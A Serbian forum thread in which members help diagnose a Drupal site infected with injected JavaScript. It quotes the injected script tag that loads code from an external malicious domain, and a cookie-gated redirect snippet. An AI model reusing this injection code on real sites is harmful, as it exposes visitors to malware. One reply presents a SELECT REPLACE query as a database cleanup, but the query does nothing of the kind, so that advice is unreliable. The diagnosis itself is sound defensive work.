Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

kako pregledati CMS-od virusa i slicnih nametnika?

[es] :: Web aplikacije :: kako pregledati CMS-od virusa i slicnih nametnika?

Strane: 1 2

[ Pregleda: 6346 | Odgovora: 25 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon kako pregledati CMS-od virusa i slicnih nametnika?07.05.2010. u 22:49 - pre 170 meseci
Sajt mi se juce bio nesto misterizozno usporio ali samo deo kad se izvrsava php pa je mozda to bilo i do php servera na hostingu. Ali jutros u dva-tri navrata dok se tako poduze ucitavalo, Avast antivirus se oglasio da je blokirao nesto. Prikazao je neki levi url koji nema veze sa mojim sajtiom.

Pretpostavljam da je moguce da se u php kod ubaci neki deo malicioznog koda.... Da li ima neki standardan sistem kako da pregledam gde je problem?
Da li mozda znate neki sajt gde mogu da ukucam url od mog sajta pa da da mi izbaci nekakvu analizu koda...

U browseru kada prikazem source nema iframea. Ali pretpostavljam da se ubacio neki uljez slican tome.

 
Odgovor na temu

Stefan Jocic
System Administrator

Član broj: 177868
Poruke: 1299
*.dynamic.isp.telekom.rs.

ICQ: 409508405


+27 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?08.05.2010. u 01:14 - pre 170 meseci
Ako se radi o sajtu iz profila, dobio sam ovu poruku:



Kako bi rešio problem potrebno je da pregledaš na serveru sve fajlove, verovatno da su se pojavili neki novi html/php fajlovi i da ukoliko naiđeš na nešto sumnjivo proveriš i obrišeš. Takođe obavesti svog hosting provajdera o svom problemu, jer postoje određeni alati na serveru koji ovde mogu pomoći. I obavezno promeni šifru za k.panel i ftp.

Verovatno su ti ubacili iFrame koji vuče neku malicioznu skriptu.

edit: tek sad pogledah da si napisao da nema iFrame-a...

[Ovu poruku je menjao Stefan Jocic dana 08.05.2010. u 14:45 GMT+1]
Prikačeni fajlovi
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?09.05.2010. u 00:42 - pre 169 meseci
Hvala!

Da taj sajt i u pitanju je bas takva poruka od Avasta ali nije uvek vec recimo pojavila se otprilike tri puta u 24h. Mislio sam da je mozda i slucajnost ali posto je i kod tebe onda je to siguran dokaz da to nije slucajnost.

Ono misteriozno usporenje je proslo bez mojih intervencija.

Radim sad backup baze pa cu napraviti Drupal update... ja mislim da pri tome on i chekira fajlove. Videcu kako ce proci...







 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?10.05.2010. u 15:11 - pre 169 meseci
Napravio sam i jedan dan nije bilo poruke ali dans se opet pojavila.

Na ostalim sjatovima kojima pristupam preko tog istog FTP accounta nema problema, tako da pretpostavljam da taj virus niej dosao tim putem. Na koji nacin moze taj virus da se ubaci u fajlove ako ne FTP-om?

Moracu promeniti sifre pa jos jednom napraviti update pa cu videti...

 
Odgovor na temu

Stefan Jocic
System Administrator

Član broj: 177868
Poruke: 1299
*.dynamic.isp.telekom.rs.

ICQ: 409508405


+27 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?10.05.2010. u 20:10 - pre 169 meseci
Da li si pored Drupala na serveru stavljao još neki script? Kao što ti rekoh ručno proveri sumnjive fajlove (pregledaj šta sve imaš na hostingu). A posebno ti savetujem da se obratiš hosting provajderu, jer postoje alati koji skeniraju server i detektuju Trojan horses i sl.
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?11.05.2010. u 00:18 - pre 169 meseci
Nisam javljao hostingu jer sam na godaddy hostingu a kod njih sam nasao ovo:
Citat:
Once your hosting server becomes infected with malware, we cannot assist you with its cleanup. You need to be proactive in preventing malware and in identifying/removing it if your server account becomes infected.


Ali ponudili su lep tekst o prevenciji, detekciji i uklanjanju toga sto meni smeta. nasao sam:
http://help.godaddy.com/article/5612

moram sad natenane da odradim sve korake i isproveravam sve.

Citat:
Da li si pored Drupala na serveru stavljao još neki script?

Nista sve osnovno i nekoliko modula ali sve sa oficijelnog sajta. A nii preko template fajlova koje sam pravio nisam pozivao nikakav javascript ni tudje elemente vec sam osnovno.

...Javicu sta je bilo kad odradim sve ono.
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?11.05.2010. u 14:55 - pre 169 meseci
U uputstvu izmedju ostalog pise:
Citat:
You can purchase or download free software that scans for malicious links in your code.

znate li neki softver koji mogu da upotrebim za ovo?
Dakle, da skinem ceo sadrzaj sajta u jedan folder pa da ga onda sa tim preskeniram.

---
Jel ima neko iskustva sa ovim alatom?
Citat:
Armorize HackAlert is a 24x7 on-demand web application malware monitoring and detection service. It leverages pattern-free behavioral analysis technology to detect and analyze malicious code injected into web pages. HackAlert 's real-time alerting capabilities provide immediate notification and details regarding malware activity. This facilitates immediate reaction and remediation in the event of website poisoning.

http://hackalert.armorize.com/default.php
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?17.05.2010. u 14:29 - pre 169 meseci
Pregledao sam fajlove "golim okom" onako kako sam znao. Nisam nasao nista sumnjivo. Pri tome sam paralelno i updejtovao neke module i brisao njihove stare fajlove....

Izgleda da je problem resen. Ne pojavljuje mi se ona poruka vec par dana.
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?19.05.2010. u 22:54 - pre 169 meseci
Evo ga veceras ponovo :(

Svaki put pise trojanac, naziv infekcije JS:Redirector-CK
 
Odgovor na temu

Ljubiša Begović
Ljubiša Begović
Beograd

Član broj: 203776
Poruke: 510
109.106.250.*

Sajt: www.besplatne-igrice-igre..


+31 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?19.05.2010. u 23:43 - pre 169 meseci

Evo šta učitava prilikom posete početnoj stranici. To se desilo prilikom prve posete večeras, posle sam opet pokušavao i nije bilo toga, a obrisao sam cache.
A samo sam ovo uspeo naći što se tiče te lokacije:
http://www.siteadvisor.com/sites/bennigans.com/postid/?p=4696126
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?20.05.2010. u 01:20 - pre 169 meseci
Hvala na pomoci!

---
Neovisno o tome,
izgleda sam na tragu. Kad se ulogujem kao administrator na sajtu imam dostupne neke "dinamicnije" alate koji korsite javascript. Svaki put kada kliknem na neki od tih dugmica ili bila sta od DHTML-a antivirus iskace sa onom porukom.
Zakljucujem da je virus skriven u javascriptu. I to verovatno u svim javascriptovima koji se ucitavaju zajedno sa stranicom.

Nasao sam sledece:
kada pogledam source kod u browseru, od javascript koda sumnjivo mi je ovo:

Code:
<script src="http://indesignstudioinfo.com/ls.php"></script>


I stvarno kada odem na taj link alarmira antivirus sa onom porukom. Probajte.

Dakle, nasao sam. :)
Jos samo da ukapiram kako da ga izbacim.




 
Odgovor na temu

Ljubiša Begović
Ljubiša Begović
Beograd

Član broj: 203776
Poruke: 510
109.106.250.*

Sajt: www.besplatne-igrice-igre..


+31 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?20.05.2010. u 01:47 - pre 169 meseci


Kada posetim ovaj url (www.3.ruboidmon-.......) iz ovog koda što si postavio
Code:
var name=getCookie("pma_visited_theme1");
if (name==""){
    setCookie("pma_visited_theme1","1",20);
    var url="http://www3.ruboidmon-64td.com...V1iqHWnG2fXpuYyGiaZpidwg%3D%3D";
    window.top.location.replace(url);
}else{

onda mi Eset blokira fajl "file.htm", ali kao što se vidi gore na slici nema nikakve putanje do njega. A za svaku stranu na onom drugom sajtu (www.emili...) koju kod stranu da posetim izbacuje tu putanju da je zaražena.
I naravno prijavljuje trojanca, sve isto kao kad se poseti tvoj sajt.
Dobro si to našao.

Skini fajlove i pretraži taj deo koda preko recimo total commander-a, on može da pretražuje sadržaj fajlova, da ne kopaš red po red u kodu. I ja trenutno radim jedan sajt u drupalu pa me baš zanima. Možda ti je do teme problem, prvo nju pregledaj.
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?20.05.2010. u 19:33 - pre 169 meseci
Ljubisa, koliko sam ja shvatio u mom kodu je samo poziv za script koji se nalazi na nekom drugom sajtu. I na tom drugom sajtu je taj virus.

Dakle analiza tog trojanaca kojeg hvata antivirus mene ne interesuje toliko. Pokusavam da resim kako je ta linija koda dosla u kod na mom sajtu. Putem FTP-a najverovatnije nije jer su mi ostali sajtovi kojima pristupam istim tim FTP accountom, sigurno cisti i ne pojavljuje se to u sourceu.
...Dakle uvukao se samo u Drupal fajlove.

Jos uvek tragam kako da ga izbacim (trajno).

Citat:
Skini fajlove i pretraži taj deo koda preko recimo total commander-a, on može da pretražuje sadržaj fajlova, da ne kopaš red po red u kodu. I ja trenutno radim jedan sajt u drupalu pa me baš zanima. Možda ti je do teme problem, prvo nju pregledaj.

Moji fajlovi od teme su cisti a isto je i kada pormenim na drugu temu. A neki od glavnih fajlova Drupala su cak read-only.

Nemam total commander ali probacu kasnije veceras...

p.s.
Nisam rekao da mi je nekoliko nedelja pre pojave ovog bilo predlagano security update za neke module. Ja jesam napravio update ali tek posle virusa.
 
Odgovor na temu

Ljubiša Begović
Ljubiša Begović
Beograd

Član broj: 203776
Poruke: 510
...148.91.adsl.dyn.beotel.net.

Sajt: www.besplatne-igrice-igre..


+31 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?20.05.2010. u 22:56 - pre 169 meseci
Znam, razumem te apsolutno. U tvom kodu je link do skripte koja vuče taj virus sa tamo nekog lažnog servera ili ko zna odakle, i prilikom izvršavanja tvog koda izvrašava se i ona sama.

Moguće je da je onda preko nekog modula, i uvek treba uraditi update istih čim ponudi, jer ima dosta modula koji su beta, a oni ih preporučuju. Možda se taj kod preko spornog modula uvukao u sam drupal sistem.

Ja bih recimo uradio i sledeće: sačuvao bazu, deaktivirao sve one dodatne module koje si ti aktivirao naknadno, izbrisao ih sa servera, još jednom sačuvao bazu podataka (nakon tih izmena), u phpadmin-u izbrisao sve tabele iz baze (znači da bude čista, prazna baza podataka), zatim ponovo pokrenuo instalaciju drupala (on će sam naći settings.php, zapravo će se reinstalirati - čak bih i drupal ponovo uploadovao, izuzev settings.php fajla), vratio sačuvanu bazu podataka (onu pre deaktiviranja i brisanja modula), i onda ponovo ubacio najnovije neophodne module.
Jeste da ima poslao oko toga, ali verujem da bi to pomoglo. Ne treba ti za to preterano mnogo vremena. A naknadno možeš pretražiti sve te fajlove koje skineš na hard, pa videti gde je konkretno problem, bitno je da se što pre rešiš te napasti.

Ako nisi koristio Total Commander, samo otvori folder u kome su ti smešteni svi fajlovi sa servera, idi na Search, i čekiraj opciju Find text, unesi reč, recimo "indesignstudioinfo" i izbaciće ti sve fajlove u kojima se to pojavljuje. Ako ne uspe probaj sa različitim rečima za pretragu, ko zna kako je to zakamuflirano.
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?21.05.2010. u 01:00 - pre 169 meseci
Hvala!

Na zalost onim pretrazivanjem nij nasao ni jedan fajl da sadrzi "indesignstudioinfo" sto je deo onog linka u kodu. Proverio sam da uspeva da pronadje ".com" "http://" i tko to... znaci pretrazvanej radi ali onaj link nije u ni jednom fajlu.

Citat:
Ja bih recimo uradio i sledeće: sačuvao bazu, deaktivirao sve one dodatne module koje si ti aktivirao naknadno, izbrisao ih sa servera, još jednom sačuvao bazu podataka (nakon tih izmena), u phpadmin-u izbrisao sve tabele iz baze (znači da bude čista, prazna baza podataka), zatim ponovo pokrenuo instalaciju drupala (on će sam naći settings.php, zapravo će se reinstalirati - čak bih i drupal ponovo uploadovao, izuzev settings.php fajla), vratio sačuvanu bazu podataka (onu pre deaktiviranja i brisanja modula), i onda ponovo ubacio najnovije neophodne module.
Jeste da ima poslao oko toga, ali verujem da bi to pomoglo. Ne treba ti za to preterano mnogo vremena. A naknadno možeš pretražiti sve te fajlove koje skineš na hard, pa videti gde je konkretno problem, bitno je da se što pre rešiš te napasti.

Ne usudjujem se jer jos uvek ne poznajem kako ide to prepoznavanje izmedju baze i fajlove. ...Druga stvar da se sajt srusio pa da moram.

Da li mozda znas gde moduli smestaju svoja podesavanja. Da li mozda u bazu? I da li si siguran?

Takdoej me brine pri backupu baze koliko su vazne one opcije kpoje nudi phpmyadmin. Ne znam koliko ce restore uspeti ako pri backupu nesto ne odaberem dobro...

 
Odgovor na temu

Ljubiša Begović
Ljubiša Begović
Beograd

Član broj: 203776
Poruke: 510
...148.91.adsl.dyn.beotel.net.

Sajt: www.besplatne-igrice-igre..


+31 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?21.05.2010. u 01:42 - pre 169 meseci
Ja sam baš to radio dva puta na drupalu, prvi put zbog testiranja, na početku izrade sajta, a drugi put jer sam stvarno zabrljao sa nekim modulima za foto galeriju, nisam uspevao da nađem odgovarajuću pa sam ih nabacao, i contact form-webform problem, nešto sam bio poremetio i nisam mogao drugačije da to ispravim a da ne ostavlja repove.

Backup baze sam radio preko cPanela (uvek tako radim), a tako sam i vraćao. U phpmyadmin-u sam samo obrisao sve tabele iz baze, znači čekirao sve tabele, izabrao drop table i potvrdio. Pokrenuo instalaciju, a zatim vratio bazu. Sve je prošlo bez ikakvih problema. Kasnije sam izvršio neophodna podešavanja, standardno kako i ide.

I na Wordpress-u sam tako backup-ovao i vraćao bazu (za par sajtova), jer sam bio prinuđen zbog promene hostinga, i nije bilo nikakvih problema.
To je što se tiče mojih slučajeva.

Ali ako ne možeš da ukloniš taj sporni kod ne vidim drugi način da rešiš taj problem. Ne znam, ja sam samo izneo svoje mišljenje šta bih ja uradio. Možda ima i boljih, lakših i bezbolnijih rešenja, pa ako neko zna javiće se valjda.
Backup se i pravi za krizne situacije, a nikad ne znaš kad će morati da vraćaš bazu (uglavnom to bude onda kad se najmanje nadaš). I ja sam strahovao kad sam to radio na Wordpress-u, ali morao sam.

Ne znam gde tačno moduli snimaju podešavanja, ali koliko vidim čini mi se da nisu svi moduli u bazi podataka a neki imaju, pa verovatno kako koji.
Trenutno radim ovaj sajt u drupalu: www.funk.hr
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?21.05.2010. u 13:31 - pre 169 meseci
Radim i ja backup samo nisam siguran da li ce restore sa tog backupa uspeti. Imao sam jedan problem na sajtu do sada. Nije nesto mogao da pristupi bazi. Ali sam sebe je popravio pokretanjem update.php

Danas cu da proucavam drupal dokumentaciju kako se to propisno radi... pa cu tako, nema druge.
 
Odgovor na temu

Stefan Jocic
System Administrator

Član broj: 177868
Poruke: 1299
*.dynamic.isp.telekom.rs.

ICQ: 409508405


+27 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?22.05.2010. u 01:47 - pre 169 meseci
Backup možeš slobodno praviti preko cPanela (full cPanel backup), tada ti se bekapuju i baza i fajlovi. I garant nećeš imati problema.
Probaj tvoj problem ovako da rešiš:

1.Napravi full cPanel backup
2.Skini ga na računar
3.Otpakuj i podigni bekap na računaru
4.Pretraži sve fajlove da nađeš te nepoznate adrese u skripti
5.Ako u fajlovima ne nađeš ništa, pokreni ovo u phpMyAdmin (pre toga selektuj bazu koju si bekapovao):

Code (sql):
SELECT REPLACE('http://indesignstudioinfo.com', 'http://indesignstudioinfo.com', '');


Ovaj kod zapravo pretražuje u bazi ovu vrednost, i ako je nađe celu tu vrednost menja u blank (prazno polje)... to je jedino rešenje koje mi pada na pamet.

Javi da li je uspelo.
 
Odgovor na temu

Ljubiša Begović
Ljubiša Begović
Beograd

Član broj: 203776
Poruke: 510
...148.91.adsl.dyn.beotel.net.

Sajt: www.besplatne-igrice-igre..


+31 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?22.05.2010. u 02:35 - pre 169 meseci
Da li možda ta neka skrivena skripta (preko modula nekog, ili ako se uvukla u sam drupal sistem) ispisuje taj red koda (<script src="http://indes...) tako što se izvršava prilikom učitavanja strane, i odnekud dovlači i generiše taj red koda (na svakoj strani), a ne zapisuje to u bazu, tako da se ta adresa (a ni taj red <script src...>) nigde fizički i ne nalazi na serveru?
Ako je tako onda je to zaista teško otkriti i izbrisati. Onda mora jovo-nanovo.
 
Odgovor na temu

Stranger2
Stranger2

Član broj: 143429
Poruke: 2572
*.adsl.net.t-com.hr.

Sajt: www.videomajstor.com


+43 Profil

icon Re: kako pregledati CMS-od virusa i slicnih nametnika?22.05.2010. u 02:57 - pre 169 meseci
Hvaal!
Bas sad citam dokumentaciju...

- Sto se tice cPanela. Da li mislite na ovo http://www.cpanel.net/

Nemam cPanel medju ponudjenim aplikacijama na Godaddy sto mi je cudno jer ima sve zivo.
...dobro to cu ostaviti za sutra.


----
Sad sam napravio ovo
Citat:
5.Ako u fajlovima ne nađeš ništa, pokreni ovo u phpMyAdmin (pre toga selektuj bazu koju si bekapovao):

Code (sql):
SELECT REPLACE('http://indesignstudioinfo.com', 'http://indesignstudioinfo.com', '');


Ovaj kod zapravo pretražuje u bazi ovu vrednost, i ako je nađe celu tu vrednost menja u blank (prazno polje)... to je jedino rešenje koje mi pada na pamet.

Javi da li je uspelo.


kao rezultat izmedju ostalog pokaze ovo
Showing rows 0 - 0 (1 total, Query took 0.0004 sec)

----
Jos jedno pitanje:
Da li ovako podesen phpadmin treba da napravi dobar backup fajl?
Takav backup sam do sada pravio ali nisam proverio da li valja. Dobijem ZIP fajl od oko 1,5 MB.
Prikačeni fajlovi
 
Odgovor na temu

[es] :: Web aplikacije :: kako pregledati CMS-od virusa i slicnih nametnika?

Strane: 1 2

[ Pregleda: 6346 | Odgovora: 25 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.